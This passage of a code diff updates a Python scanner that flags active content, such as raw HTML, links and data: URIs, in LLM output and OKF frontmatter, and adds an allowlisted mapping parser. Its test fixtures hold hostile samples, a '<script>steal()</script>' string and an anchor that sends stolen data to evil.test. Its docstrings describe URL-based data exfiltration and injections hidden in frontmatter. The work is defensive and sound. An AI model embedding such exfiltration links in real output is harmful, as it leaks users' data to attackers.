"Programming Language :: Python :: 3",
|
||||||
|
|
|
||||||
|
|
@ -63,7 +63,7 @@ from .grounding import (
|
||||||
)
|
)
|
||||||
from . import okf
|
from . import okf
|
||||||
|
|
||||||
__version__ = "0.6.1"
|
__version__ = "1.2.0"
|
||||||
|
|
||||||
|
|
||||||
# --- §6 bookends: the two library-side halves around the transform ---------
|
# --- §6 bookends: the two library-side halves around the transform ---------
|
||||||
|
|
|
||||||
|
|
@ -40,6 +40,57 @@ XML has no affordance in any renderer. Measured together rather than one at a ti
|
||||||
reference corpus and 2 each on the two wiki corpora, at unchanged recall. Method
|
reference corpus and 2 each on the two wiki corpora, at unchanged recall. Method
|
||||||
and numbers: ``docs/rawhtml-census.py``; residuals: ``docs/LIMITATIONS.md``.
|
and numbers: ``docs/rawhtml-census.py``; residuals: ``docs/LIMITATIONS.md``.
|
||||||
|
|
||||||
|
**Raw HTML grades on carrier too, and a tag that names no target is inert**
|
||||||
|
(0.7.0). Two changes that had to ship together, because they co-occur:
|
||||||
|
|
||||||
|
* the *carrier split* — ``<a>``/``<area>`` are click-required, so they report as
|
||||||
|
``active:raw-html-link`` at MEDIUM, the grade the markdown inline link has
|
||||||
|
carried since 0.3.1. Until 0.6.1 the same URL was LOW as ``[t](url)`` and HIGH
|
||||||
|
as ``<a href="url">``: an asymmetry produced by syntax, not by affordance.
|
||||||
|
* the *no-URL narrowing* — a tag whose entire affordance IS the URL it names
|
||||||
|
(``_URL_AFFORDANCE_TAGS``), carrying no URL attribute at all, has no affordance
|
||||||
|
in any renderer. This is ``<base />``'s argument from 0.6.0 applied to the rest
|
||||||
|
of the name branch, and it frees ``</a>``, ``<Frame>``, ``<video />`` and
|
||||||
|
``<img alt=...>`` without ``src``.
|
||||||
|
|
||||||
|
They had to ship together because they co-occur: the narrowing strips a document's
|
||||||
|
``</a>``/``<Frame>``, and what remains is the ``<a href=...>`` the split grades
|
||||||
|
down, so each change alone leaves the document blocked by the other's residue. The
|
||||||
|
split never lets a document reach WARN — it converts a hard block into a human
|
||||||
|
review, which is the difference a consumer actually feels and the reason the census
|
||||||
|
reports ``fail_secure`` alongside non-WARN.
|
||||||
|
|
||||||
|
**Measured through the census on three populations, each at one corpus state**
|
||||||
|
(``fail_secure`` under ``PRESET_USER_UPLOAD``, 0.6.0 as shipped -> 0.7.0; the
|
||||||
|
ceiling is the detector switched off entirely):
|
||||||
|
|
||||||
|
=================== ========= ============= ======= =========================
|
||||||
|
population documents 0.6.0 -> 0.7.0 ceiling tightens (upload/trusted)
|
||||||
|
=================== ========= ============= ======= =========================
|
||||||
|
reference-corpus 389 54 -> 53 53 0 / 0
|
||||||
|
vendor-harvest 187 62 -> 20 18 0 / 0
|
||||||
|
generated-notes 552 59 -> 15 13 0 / 0
|
||||||
|
=================== ========= ============= ======= =========================
|
||||||
|
|
||||||
|
The pair takes **42 of the 44 achievable on vendor-harvest and 44 of 46 on
|
||||||
|
generated-notes** — 95% and 96% of what switching the detector off would buy.
|
||||||
|
reference-corpus was already emptied of raw-HTML drivers by the 0.6.0 narrowing,
|
||||||
|
so it bounds the change rather than showing its value; the wiki corpora are where
|
||||||
|
the volume is.
|
||||||
|
|
||||||
|
**Neither change alone reaches half of it, and the residual is identical in both
|
||||||
|
corpora.** The split alone frees 8 documents in each; the narrowing alone frees 21
|
||||||
|
and 23. 8+21 against a measured 42, and 8+23 against a measured 44: **13 documents
|
||||||
|
per corpus are freed by the pair and by neither member** — the narrowing strips a
|
||||||
|
document's ``</a>``/``<Frame>`` and what remains is the ``<a href=...>`` the split
|
||||||
|
grades down. Shipping either alone would have measured as barely worth the label.
|
||||||
|
Method and rows: ``docs/rawhtml-census.py``.
|
||||||
|
|
||||||
|
The URL-attribute branch deliberately stays on the HIGH side of the split. A name
|
||||||
|
outside the active set has unknown rendering and ``href`` is not the only URL
|
||||||
|
attribute it may carry; grading ``<Card src="...">`` as a link would be reasoning,
|
||||||
|
not measurement.
|
||||||
|
|
||||||
**Severity grades on URL shape, not construct type** (0.3.1). The exfiltration
|
**Severity grades on URL shape, not construct type** (0.3.1). The exfiltration
|
||||||
primitive is not "an image" — it is a URL that moves bytes to a host the
|
primitive is not "an image" — it is a URL that moves bytes to a host the
|
||||||
attacker controls. ```` carries nothing
|
attacker controls. ```` carries nothing
|
||||||
|
|
@ -49,8 +100,12 @@ document with one remote image fail-secured). :func:`is_ordinary_url` separates
|
||||||
the two axes: a URL that only *names* a remote document is
|
the two axes: a URL that only *names* a remote document is
|
||||||
``ACTIVE_CONTENT_ORDINARY_SEVERITY``; anything that can carry a value —
|
``ACTIVE_CONTENT_ORDINARY_SEVERITY``; anything that can carry a value —
|
||||||
a query, userinfo, percent-escapes, or an opaque host label / path segment —
|
a query, userinfo, percent-escapes, or an opaque host label / path segment —
|
||||||
keeps the carrier's full severity. ``raw-html`` and ``data:`` URIs have no
|
keeps the carrier's full severity. The raw-HTML classes and ``data:`` URIs have no
|
||||||
ordinary form and stay HIGH unconditionally: they are active whatever the URL.
|
ordinary form and keep their carrier's severity unconditionally — HIGH for
|
||||||
|
``raw-html``, MEDIUM for ``raw-html-link``: they are active whatever the URL, and
|
||||||
|
an event handler needs no URL at all. Applying ``is_ordinary_url`` to raw tags was
|
||||||
|
considered and rejected: real vendor-doc image URLs are largely not ordinary, so it
|
||||||
|
buys little, and it would add a third tier to a class nobody asked to have three.
|
||||||
|
|
||||||
The opacity test reuses ``entropy``'s primitives rather than inventing a second
|
The opacity test reuses ``entropy``'s primitives rather than inventing a second
|
||||||
heuristic, and it is a *backstop*, not the main line of defence: a literal
|
heuristic, and it is a *backstop*, not the main line of defence: a literal
|
||||||
|
|
@ -200,6 +255,21 @@ _ACTIVE_TAGS = frozenset({
|
||||||
# URL-attribute branch still catches; `<base />` without one is inert. The mutator
|
# URL-attribute branch still catches; `<base />` without one is inert. The mutator
|
||||||
# keeps the full set — see the module docstring.
|
# keeps the full set — see the module docstring.
|
||||||
_SCANNER_ACTIVE_TAGS = _ACTIVE_TAGS - {"base"}
|
_SCANNER_ACTIVE_TAGS = _ACTIVE_TAGS - {"base"}
|
||||||
|
# Tags whose entire active affordance IS the URL they name. Carrying no URL
|
||||||
|
# attribute at all, they name no target, so no renderer can fetch or follow them
|
||||||
|
# — `<base />`'s argument (0.6.0) applied to the rest of the name branch. The
|
||||||
|
# shapes this frees, observed inside vendor-harvest's fail_secure documents:
|
||||||
|
# `</a>`, `<Frame>`/`</Frame>`, `<video />`, and `<img alt=...>` with no `src` —
|
||||||
|
# end tags and MDX wrapper components dominate.
|
||||||
|
# Everything else in the name set does something a URL cannot describe —
|
||||||
|
# `<script>` executes its body, `<style>` restyles, `<form>` submits — and stays
|
||||||
|
# active with no attributes at all.
|
||||||
|
_URL_AFFORDANCE_TAGS = frozenset({
|
||||||
|
"a", "area", "img", "video", "audio", "source", "track", "frame", "frameset",
|
||||||
|
})
|
||||||
|
# Click-required carriers: following one needs a human, exactly like a markdown
|
||||||
|
# inline link. Everything else the renderer fetches or executes unattended.
|
||||||
|
_LINK_TAGS = frozenset({"a", "area"})
|
||||||
|
|
||||||
# `_URL_ATTR_RE` above is a presence test and deliberately captures no value.
|
# `_URL_ATTR_RE` above is a presence test and deliberately captures no value.
|
||||||
# Reading the value needs the same literal alternation with the value attached, so
|
# Reading the value needs the same literal alternation with the value attached, so
|
||||||
|
|
@ -236,12 +306,42 @@ def _url_attr_is_external(attrs: str) -> bool:
|
||||||
return not seen
|
return not seen
|
||||||
|
|
||||||
|
|
||||||
|
def active_tag_class(name: str, attrs: str) -> str | None:
|
||||||
|
"""The active-content class a raw tag belongs to, or ``None`` if it is inert.
|
||||||
|
|
||||||
|
``"raw-html-link"`` is the click-required carrier class; ``"raw-html"`` is
|
||||||
|
everything the renderer acts on unattended. The event-handler test runs
|
||||||
|
FIRST, before the name test, so an ``<a onclick=...>`` is graded as the
|
||||||
|
execute-class carrier it is rather than downgraded with the anchors.
|
||||||
|
"""
|
||||||
|
lowered = name.lower()
|
||||||
|
if _EVENT_ATTR_RE.search(attrs):
|
||||||
|
return "raw-html"
|
||||||
|
# Presence, not a readable value: a URL attribute whose value this module
|
||||||
|
# cannot resolve must keep the tag active, mirroring `_url_attr_is_external`'s
|
||||||
|
# fail-secure gap. The corpora carry 0 of these today — empirical, not
|
||||||
|
# structural, so the predicate must not depend on that holding.
|
||||||
|
has_url_attr = bool(_URL_ATTR_RE.search(attrs))
|
||||||
|
if lowered in _SCANNER_ACTIVE_TAGS:
|
||||||
|
if lowered in _URL_AFFORDANCE_TAGS and not has_url_attr:
|
||||||
|
return None
|
||||||
|
return "raw-html-link" if lowered in _LINK_TAGS else "raw-html"
|
||||||
|
# A name outside the active set is active only through its URL attribute, and
|
||||||
|
# stays on the HIGH side: its rendering is unknown and `href` is not the only
|
||||||
|
# URL attribute it may carry. Measured cost of that conservatism: one
|
||||||
|
# document per wiki corpus.
|
||||||
|
if has_url_attr and _url_attr_is_external(attrs):
|
||||||
|
return "raw-html"
|
||||||
|
return None
|
||||||
|
|
||||||
|
|
||||||
def is_active_tag(name: str, attrs: str) -> bool:
|
def is_active_tag(name: str, attrs: str) -> bool:
|
||||||
"""True if a tag is active for the SCANNER: executing element, event handler,
|
"""True if a tag is active for the SCANNER, in either carrier class.
|
||||||
or a URL attribute pointing at an external target."""
|
|
||||||
if name.lower() in _SCANNER_ACTIVE_TAGS or _EVENT_ATTR_RE.search(attrs):
|
Kept as a separate symbol because ``docs/rawhtml-census.py`` patches it to
|
||||||
return True
|
measure a candidate predicate, and consumers import it by name.
|
||||||
return bool(_URL_ATTR_RE.search(attrs)) and _url_attr_is_external(attrs)
|
"""
|
||||||
|
return active_tag_class(name, attrs) is not None
|
||||||
|
|
||||||
|
|
||||||
def is_defangable_tag(name: str, attrs: str) -> bool:
|
def is_defangable_tag(name: str, attrs: str) -> bool:
|
||||||
|
|
@ -416,18 +516,24 @@ def scan_active_content(
|
||||||
_flag("autolink", autos)
|
_flag("autolink", autos)
|
||||||
|
|
||||||
# Raw HTML is active whatever its URL looks like (an event handler needs no
|
# Raw HTML is active whatever its URL looks like (an event handler needs no
|
||||||
# URL at all), so every tag is flagged as carrying — no ordinary form.
|
# URL at all), so every tag is flagged as carrying — no ordinary form. The
|
||||||
html: list[tuple[str, bool]] = []
|
# two carrier classes are collected separately: a document holding both a
|
||||||
|
# `<script>` and an `<a href>` must not lose the anchor behind the script,
|
||||||
|
# nor grade the script down to the anchor's severity.
|
||||||
|
html: dict[str, list[tuple[str, bool]]] = {"raw-html": [], "raw-html-link": []}
|
||||||
|
|
||||||
def _tag(m: re.Match[str]) -> str:
|
def _tag(m: re.Match[str]) -> str:
|
||||||
if not is_active_tag(m.group("name"), m.group("attrs") or ""):
|
cls = active_tag_class(m.group("name"), m.group("attrs") or "")
|
||||||
|
if cls is None:
|
||||||
return m.group(0)
|
return m.group(0)
|
||||||
html.append((URL_IN_TEXT_RE.sub(lambda u: defang_url(u.group(0)), m.group(0)), False))
|
html[cls].append(
|
||||||
|
(URL_IN_TEXT_RE.sub(lambda u: defang_url(u.group(0)), m.group(0)), False))
|
||||||
return " " * len(m.group(0))
|
return " " * len(m.group(0))
|
||||||
|
|
||||||
masked = HTML_TAG_RE.sub(_tag, masked)
|
masked = HTML_TAG_RE.sub(_tag, masked)
|
||||||
if html:
|
for cls in ("raw-html", "raw-html-link"):
|
||||||
_flag("raw-html", html)
|
if html[cls]:
|
||||||
|
_flag(cls, html[cls])
|
||||||
|
|
||||||
# A `data:` URI carries its own payload; `is_ordinary_url` rejects the scheme
|
# A `data:` URI carries its own payload; `is_ordinary_url` rejects the scheme
|
||||||
# outright, so this stays HIGH through the same path as the rest.
|
# outright, so this stays HIGH through the same path as the rest.
|
||||||
|
|
|
||||||
|
|
@ -129,6 +129,11 @@ ACTIVE_CONTENT_SEVERITY = {
|
||||||
"reference-link": Severity.MEDIUM,
|
"reference-link": Severity.MEDIUM,
|
||||||
"autolink": Severity.MEDIUM,
|
"autolink": Severity.MEDIUM,
|
||||||
"raw-html": Severity.HIGH,
|
"raw-html": Severity.HIGH,
|
||||||
|
# The raw-HTML carrier split (0.7.0). Until 0.6.1 every active tag was HIGH,
|
||||||
|
# so the same URL was MEDIUM as `[t](url)` and HIGH as `<a href="url">` — an
|
||||||
|
# asymmetry that came from syntax rather than affordance. Following an anchor
|
||||||
|
# needs a human, so it grades with the other click-required carriers.
|
||||||
|
"raw-html-link": Severity.MEDIUM,
|
||||||
"data-uri": Severity.HIGH,
|
"data-uri": Severity.HIGH,
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -485,6 +485,12 @@ def _build_cases() -> list[Case]:
|
||||||
f"", owasp="LLM05"),
|
f"", owasp="LLM05"),
|
||||||
_scan_case("active", "raw active HTML", "active:raw-html",
|
_scan_case("active", "raw active HTML", "active:raw-html",
|
||||||
"<script>steal()</script>", owasp="LLM05"),
|
"<script>steal()</script>", owasp="LLM05"),
|
||||||
|
# The carrier split (0.7.0): a raw anchor is click-required, so it grades
|
||||||
|
# with the markdown link rather than with the zero-click carriers. It is
|
||||||
|
# its own class, and recall for it is demonstrated separately — a label a
|
||||||
|
# consumer can pin needs a row here, or 128/128 would silently exclude it.
|
||||||
|
_scan_case("active", "raw HTML anchor (click-required)", "active:raw-html-link",
|
||||||
|
'<a href="https://evil.test/collect?d=stolen">t</a>', owasp="LLM05"),
|
||||||
_scan_case("active", "standalone data: URI in prose", "active:data-uri",
|
_scan_case("active", "standalone data: URI in prose", "active:data-uri",
|
||||||
"payload data:text/html;base64,PHN2Zz4= end", owasp="LLM05"),
|
"payload data:text/html;base64,PHN2Zz4= end", owasp="LLM05"),
|
||||||
_predicate_case("active", "ordinary document is NOT over-blocked", "warn",
|
_predicate_case("active", "ordinary document is NOT over-blocked", "warn",
|
||||||
|
|
@ -536,8 +542,11 @@ def _build_cases() -> list[Case]:
|
||||||
lambda: okf.parse_frontmatter("---\nkey:\n nested: x\n---\nbody\n"), owasp="LLM10"),
|
lambda: okf.parse_frontmatter("---\nkey:\n nested: x\n---\nbody\n"), owasp="LLM10"),
|
||||||
_raise_case("okf", "T2 frontmatter block scalar", "OKFFrontmatterError",
|
_raise_case("okf", "T2 frontmatter block scalar", "OKFFrontmatterError",
|
||||||
lambda: okf.parse_frontmatter("---\ndesc: |\n block\n---\nbody\n"), owasp="LLM10"),
|
lambda: okf.parse_frontmatter("---\ndesc: |\n block\n---\nbody\n"), owasp="LLM10"),
|
||||||
_raise_case("okf", "T2 frontmatter flow collection", "OKFFrontmatterError",
|
_raise_case("okf", "T2 frontmatter flow sequence", "OKFFrontmatterError",
|
||||||
lambda: okf.parse_frontmatter("---\ntags: [a, b]\n---\nbody\n"), owasp="LLM10"),
|
lambda: okf.parse_frontmatter("---\ntags: [a, b]\n---\nbody\n"), owasp="LLM10"),
|
||||||
|
_raise_case("okf", "T2 mapping key off the allowlist", "OKFFrontmatterError",
|
||||||
|
lambda: okf.parse_frontmatter(
|
||||||
|
"---\ngenerated: { by: a, tool: shell }\n---\nbody\n"), owasp="LLM10"),
|
||||||
_raise_case("okf", "T3 resource non-https (http)", "OKFResourceError",
|
_raise_case("okf", "T3 resource non-https (http)", "OKFResourceError",
|
||||||
lambda: okf.validate_resource_url("http://insecure.test/x"), owasp="LLM05"),
|
lambda: okf.validate_resource_url("http://insecure.test/x"), owasp="LLM05"),
|
||||||
_raise_case("okf", "T3 resource data: scheme", "OKFResourceError",
|
_raise_case("okf", "T3 resource data: scheme", "OKFResourceError",
|
||||||
|
|
|
||||||
|
|
@ -7,7 +7,8 @@ and feeds scannable text regions into the existing ``sanitize`` / ``scan_output`
|
||||||
|
|
||||||
T2 — frontmatter parse-safety gate. ``parse_frontmatter`` is a *strict,
|
T2 — frontmatter parse-safety gate. ``parse_frontmatter`` is a *strict,
|
||||||
reject-by-default* loader for the minimal OKF frontmatter subset: flat
|
reject-by-default* loader for the minimal OKF frontmatter subset: flat
|
||||||
``key: value`` scalars plus block ``- item`` lists. Every construct the
|
``key: value`` scalars, block ``- item`` lists, and one typed, allowlisted
|
||||||
|
mapping form (``{ by: x, at: y }`` — see :func:`_parse_flow_mapping`). Every construct the
|
||||||
"block anchor/alias DoS + dangerous type coercion" requirement names is refused
|
"block anchor/alias DoS + dangerous type coercion" requirement names is refused
|
||||||
*by construction* — you cannot suffer a billion-laughs alias expansion or a
|
*by construction* — you cannot suffer a billion-laughs alias expansion or a
|
||||||
``!!python/object`` coercion if anchors, aliases and explicit tags are rejected
|
``!!python/object`` coercion if anchors, aliases and explicit tags are rejected
|
||||||
|
|
@ -16,7 +17,9 @@ philosophy, the frontmatter analogue of the ``resource`` reject-gate (T3).
|
||||||
|
|
||||||
Deliberately NOT a general YAML parser. A security tool whose thesis is
|
Deliberately NOT a general YAML parser. A security tool whose thesis is
|
||||||
minimal-dependency should not pull in a full YAML engine whose own features
|
minimal-dependency should not pull in a full YAML engine whose own features
|
||||||
(anchors, tags, merges) are the attack surface being defended against. Quoted
|
(anchors, tags, merges) are the attack surface being defended against. The one
|
||||||
|
mapping form it does admit is admitted key-by-key against an allowlist, not
|
||||||
|
parsed generally: the mapping class is expressible, never trusted. Quoted
|
||||||
scalars are kept verbatim (quotes included) rather than unquoted — the value is
|
scalars are kept verbatim (quotes included) rather than unquoted — the value is
|
||||||
still scanned as text downstream, so an injection inside a quoted value is not
|
still scanned as text downstream, so an injection inside a quoted value is not
|
||||||
lost; richer scalar forms are a future refinement, not a silent parse.
|
lost; richer scalar forms are a future refinement, not a silent parse.
|
||||||
|
|
@ -62,8 +65,31 @@ _KEY_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_-]*$")
|
||||||
# A plain OKF scalar cannot *begin* with a YAML structural indicator. Any value
|
# A plain OKF scalar cannot *begin* with a YAML structural indicator. Any value
|
||||||
# starting with one signals an anchor (&), alias (*), explicit tag (!), block
|
# starting with one signals an anchor (&), alias (*), explicit tag (!), block
|
||||||
# scalar (|, >), flow collection ([ ] { }), directive (%) or reserved char
|
# scalar (|, >), flow collection ([ ] { }), directive (%) or reserved char
|
||||||
# (@ `) — all outside the supported subset and all rejected.
|
# (@ `) — all outside the supported subset and all rejected. `{` is tried as the
|
||||||
|
# allowlisted mapping form FIRST (G3); it reaches this predicate only as a leaf
|
||||||
|
# inside one, where a nested collection is refused before it can be read.
|
||||||
_DANGEROUS_VALUE_STARTS = frozenset("&*!|>[]{}%@`")
|
_DANGEROUS_VALUE_STARTS = frozenset("&*!|>[]{}%@`")
|
||||||
|
# A quoted scalar is a scalar in YAML however many colons it carries, so the
|
||||||
|
# mapping check steps aside for one. The quotes are retained rather than
|
||||||
|
# stripped — a pre-existing divergence, pinned in tests/test_okf.py.
|
||||||
|
_QUOTE_STARTS = frozenset("\"'")
|
||||||
|
|
||||||
|
# G3 — the one mapping form T2 can express (operator decision, 2026-08-21).
|
||||||
|
# Every key inside a mapping must be on this allowlist: the form is safe because
|
||||||
|
# the allowlist inspects each key, not because mappings became trusted. The keys
|
||||||
|
# are the ones OKF v0.2 names inside a mapping - `by`/`at` (SPEC.md @ 62432a09
|
||||||
|
# §5.2 `generated`/`verified`), `from`/`to` (§5.1 `usage_window`) and the
|
||||||
|
# `sources`-entry fields (§5.1). `resource` is the one §5.1 key deliberately
|
||||||
|
# LEFT OFF: it is a pointer rather than a label, it is the only key T3 exists
|
||||||
|
# for, and admitting it inside a mapping would re-open the door-C route closed
|
||||||
|
# in 1.1.0 (`executor: {resource: skills/run.md}` puts an executable-code
|
||||||
|
# pointer in a key the https allowlist never inspects). It costs nothing today,
|
||||||
|
# because the conformant carrier for `sources[].resource` is the block-sequence
|
||||||
|
# of block-mappings, which this form does not admit either way.
|
||||||
|
_MAPPING_KEY_ALLOWLIST = frozenset({
|
||||||
|
"by", "at", "from", "to", "id", "title", "author", "usage_count",
|
||||||
|
"last_modified",
|
||||||
|
})
|
||||||
|
|
||||||
|
|
||||||
class OKFError(Exception):
|
class OKFError(Exception):
|
||||||
|
|
@ -102,7 +128,10 @@ def parse_frontmatter(document):
|
||||||
|
|
||||||
Raises ``OKFFrontmatterError`` on an unterminated fence or any construct
|
Raises ``OKFFrontmatterError`` on an unterminated fence or any construct
|
||||||
outside the minimal flat subset (anchors, aliases, explicit tags, merge
|
outside the minimal flat subset (anchors, aliases, explicit tags, merge
|
||||||
keys, block scalars, flow collections, nested mappings).
|
keys, block scalars, flow sequences, nested mappings). The single exception
|
||||||
|
is the typed, allowlisted flow mapping (:func:`_parse_flow_mapping`), which
|
||||||
|
parses into a ``dict`` of allowlisted keys with plain-scalar leaves — every
|
||||||
|
other route to a mapping still raises.
|
||||||
"""
|
"""
|
||||||
lines = document.split("\n")
|
lines = document.split("\n")
|
||||||
if not lines or lines[0].strip() != _FENCE:
|
if not lines or lines[0].strip() != _FENCE:
|
||||||
|
|
@ -145,13 +174,29 @@ def _scannable_regions(frontmatter, body):
|
||||||
"""The text regions of a concept that carry attacker-controlled content."""
|
"""The text regions of a concept that carry attacker-controlled content."""
|
||||||
regions = [body]
|
regions = [body]
|
||||||
for value in frontmatter.values():
|
for value in frontmatter.values():
|
||||||
if isinstance(value, list):
|
regions.extend(_value_regions(value))
|
||||||
regions.extend(value)
|
|
||||||
elif value:
|
|
||||||
regions.append(value)
|
|
||||||
return regions
|
return regions
|
||||||
|
|
||||||
|
|
||||||
|
def _value_regions(value):
|
||||||
|
"""Every scannable leaf of one frontmatter value.
|
||||||
|
|
||||||
|
A mapping value (G3) is a new *shape* on this surface, not a new exemption:
|
||||||
|
its leaves are scanned exactly like a scalar or a list item, so an injection
|
||||||
|
parked in ``generated: { by: ... }`` reaches ``scan_output`` like any other
|
||||||
|
frontmatter text. Mapping *keys* are not scanned because they cannot carry
|
||||||
|
attacker text - the allowlist admits nine fixed names and nothing else.
|
||||||
|
"""
|
||||||
|
if isinstance(value, dict):
|
||||||
|
return [leaf for leaf in value.values() if leaf]
|
||||||
|
if isinstance(value, list):
|
||||||
|
regions = []
|
||||||
|
for item in value:
|
||||||
|
regions.extend(_value_regions(item))
|
||||||
|
return regions
|
||||||
|
return [value] if value else []
|
||||||
|
|
||||||
|
|
||||||
def validate_concept_path(path, *, allow_reserved=False):
|
def validate_concept_path(path, *, allow_reserved=False):
|
||||||
"""Validate a bundle-relative concept path and return its concept-ID.
|
"""Validate a bundle-relative concept path and return its concept-ID.
|
||||||
|
|
||||||
|
|
@ -575,7 +620,14 @@ def _parse_flat(fm_lines):
|
||||||
result[key] = items if items is not None else ""
|
result[key] = items if items is not None else ""
|
||||||
continue
|
continue
|
||||||
|
|
||||||
|
mapping = _parse_flow_mapping(value)
|
||||||
|
if mapping is not None:
|
||||||
|
result[key] = mapping
|
||||||
|
i += 1
|
||||||
|
continue
|
||||||
|
|
||||||
_reject_dangerous_value(value)
|
_reject_dangerous_value(value)
|
||||||
|
_reject_mapping_construct(value)
|
||||||
result[key] = value
|
result[key] = value
|
||||||
i += 1
|
i += 1
|
||||||
|
|
||||||
|
|
@ -600,7 +652,13 @@ def _consume_block_list(fm_lines, start):
|
||||||
continue
|
continue
|
||||||
if raw[:1] in (" ", "\t") and stripped.startswith("- "):
|
if raw[:1] in (" ", "\t") and stripped.startswith("- "):
|
||||||
item = stripped[2:].strip()
|
item = stripped[2:].strip()
|
||||||
|
mapping = _parse_flow_mapping(item)
|
||||||
|
if mapping is not None:
|
||||||
|
items.append(mapping)
|
||||||
|
i += 1
|
||||||
|
continue
|
||||||
_reject_dangerous_value(item)
|
_reject_dangerous_value(item)
|
||||||
|
_reject_mapping_construct(item)
|
||||||
items.append(item)
|
items.append(item)
|
||||||
i += 1
|
i += 1
|
||||||
continue
|
continue
|
||||||
|
|
@ -616,3 +674,127 @@ def _reject_dangerous_value(value):
|
||||||
"value begins with a disallowed YAML indicator %r: %r"
|
"value begins with a disallowed YAML indicator %r: %r"
|
||||||
% (value[0], value)
|
% (value[0], value)
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _reject_mapping_construct(value):
|
||||||
|
"""Reject a scalar that YAML reads as a mapping rather than as a string.
|
||||||
|
|
||||||
|
T2 gives the mapping *class* exactly one expressible form, the typed
|
||||||
|
allowlisted flow mapping (G3); the nested-block and dotted-key routes still
|
||||||
|
raise, and this predicate is what keeps them raising — both at the top level
|
||||||
|
and on a leaf *inside* an admitted mapping. Two routes used to escape by degrading
|
||||||
|
into a string instead: a block-sequence item carrying exactly one key
|
||||||
|
(``- uri: x``), and an inline second colon (``attester: resource: x``).
|
||||||
|
Both parsed "successfully" into the wrong *type*, and a pointer parked in
|
||||||
|
one rode through in a key the ``resource`` allowlist never inspects.
|
||||||
|
|
||||||
|
``": "`` and a trailing ``":"`` are exactly the two shapes where a plain
|
||||||
|
scalar stops being one — ground-truthed against PyYAML 6.0.3, which reads
|
||||||
|
``- uri: x`` as ``[{'uri': 'x'}]``, ``- uri:`` as ``[{'uri': None}]``, and
|
||||||
|
refuses ``k: sub: v`` outright. A colon carrying neither a space nor a line
|
||||||
|
end opens no mapping (``domain:security``, ``https://e.com:8443/a``) and is
|
||||||
|
left alone, as is a quoted scalar — over-blocking a conformant bundle is
|
||||||
|
itself a failure mode.
|
||||||
|
"""
|
||||||
|
if not value or value[0] in _QUOTE_STARTS:
|
||||||
|
return
|
||||||
|
if ": " in value or value.endswith(":"):
|
||||||
|
raise OKFFrontmatterError(
|
||||||
|
"a mapping is not expressible in OKF frontmatter: %r" % (value,)
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _parse_flow_mapping(value):
|
||||||
|
"""Parse ``{ key: value, ... }`` into a typed dict, or refuse it (G3).
|
||||||
|
|
||||||
|
Returns ``None`` when ``value`` does not open a flow mapping, so the caller
|
||||||
|
falls through to the unchanged scalar rules. Otherwise the value either
|
||||||
|
parses into a ``dict`` of allowlisted keys with plain-scalar leaves, or
|
||||||
|
raises - it never degrades into a string, which is the defect closed in
|
||||||
|
1.1.0 and not reopened here.
|
||||||
|
|
||||||
|
Why the mapping class needed *a* form at all: OKF v0.2 writes its whole
|
||||||
|
trust and provenance layer as mappings, and SPEC.md @ ``62432a09`` uses flow
|
||||||
|
form in its own examples (§5.1 ``usage_window``, §5.2 ``generated`` /
|
||||||
|
``verified``). §11 goes further than "should": a consumer *MUST* treat a
|
||||||
|
bare ``verified`` mapping as a one-element list - a rule that presupposes
|
||||||
|
the mapping parses. With no form, 0 of 53 upstream concepts reached the
|
||||||
|
gate, and no threshold would have changed that.
|
||||||
|
|
||||||
|
Why this form is safe: the allowlist inspects **every key**, which is the
|
||||||
|
property that actually carried the security in T2 - the blanket refusal was
|
||||||
|
the enforcement, not the point. Admitted, ground-truthed against PyYAML
|
||||||
|
6.0.3:
|
||||||
|
|
||||||
|
- one flow mapping per value, closed on the same line (``{ a: b }``);
|
||||||
|
- keys on :data:`_MAPPING_KEY_ALLOWLIST` and matching ``_KEY_RE``, no
|
||||||
|
duplicates - PyYAML resolves a duplicate last-wins, which is a way to
|
||||||
|
show one claim and mean another;
|
||||||
|
- plain-scalar leaves only, each run through the *unchanged*
|
||||||
|
``_reject_dangerous_value`` / ``_reject_mapping_construct`` predicates, so
|
||||||
|
a leaf can no more open an anchor, a tag or a nested mapping than a
|
||||||
|
top-level scalar can.
|
||||||
|
|
||||||
|
Refused, each on its own rule: nested collections (``{ a: { b: c } }``,
|
||||||
|
``{ a: [1] }``), quoted leaves, an empty mapping, an unclosed or
|
||||||
|
trailing-junk value (``{ a: b } x``, which PyYAML also refuses), a key
|
||||||
|
outside the allowlist, and ``{a:b}`` - which PyYAML reads as the *key*
|
||||||
|
``a:b``, not as a scalar, and which the required ``": "`` separator catches.
|
||||||
|
|
||||||
|
Two deliberate divergences from PyYAML, both toward refusal: a quoted leaf
|
||||||
|
(``{ title: 'a, b' }``) and a trailing comment (``{ a: b } # note``) are
|
||||||
|
conformant YAML that this rejects. Splitting quoted commas correctly needs a
|
||||||
|
quote state machine whose failure mode is *accepting* something YAML would
|
||||||
|
refuse; refusing is the cheaper side to be wrong on, and the keys that
|
||||||
|
plausibly need a comma (``title``, ``author``) only occur inside ``sources``
|
||||||
|
entries, whose block-sequence carrier is refused anyway.
|
||||||
|
"""
|
||||||
|
if not value or value[0] != "{":
|
||||||
|
return None
|
||||||
|
if not value.endswith("}"):
|
||||||
|
raise OKFFrontmatterError(
|
||||||
|
"a flow mapping must be closed by '}' on the same line: %r" % (value,)
|
||||||
|
)
|
||||||
|
|
||||||
|
inner = value[1:-1].strip()
|
||||||
|
if inner.endswith(","): # a trailing comma is legal YAML; one, and only one
|
||||||
|
inner = inner[:-1].strip()
|
||||||
|
if not inner:
|
||||||
|
raise OKFFrontmatterError("an empty flow mapping carries nothing: %r" % (value,))
|
||||||
|
for char in "{}[]":
|
||||||
|
if char in inner:
|
||||||
|
raise OKFFrontmatterError(
|
||||||
|
"a flow mapping admits scalar leaves only, not %r: %r" % (char, value)
|
||||||
|
)
|
||||||
|
for quote in _QUOTE_STARTS:
|
||||||
|
if quote in inner:
|
||||||
|
raise OKFFrontmatterError(
|
||||||
|
"a quoted scalar inside a flow mapping is not a supported form: %r"
|
||||||
|
% (value,)
|
||||||
|
)
|
||||||
|
|
||||||
|
mapping = {}
|
||||||
|
for entry in inner.split(","):
|
||||||
|
entry = entry.strip()
|
||||||
|
key, sep, leaf = entry.partition(": ")
|
||||||
|
if not sep:
|
||||||
|
raise OKFFrontmatterError(
|
||||||
|
"a flow-mapping entry must be 'key: value': %r" % (entry,)
|
||||||
|
)
|
||||||
|
key = key.strip()
|
||||||
|
leaf = leaf.strip()
|
||||||
|
if not _KEY_RE.match(key):
|
||||||
|
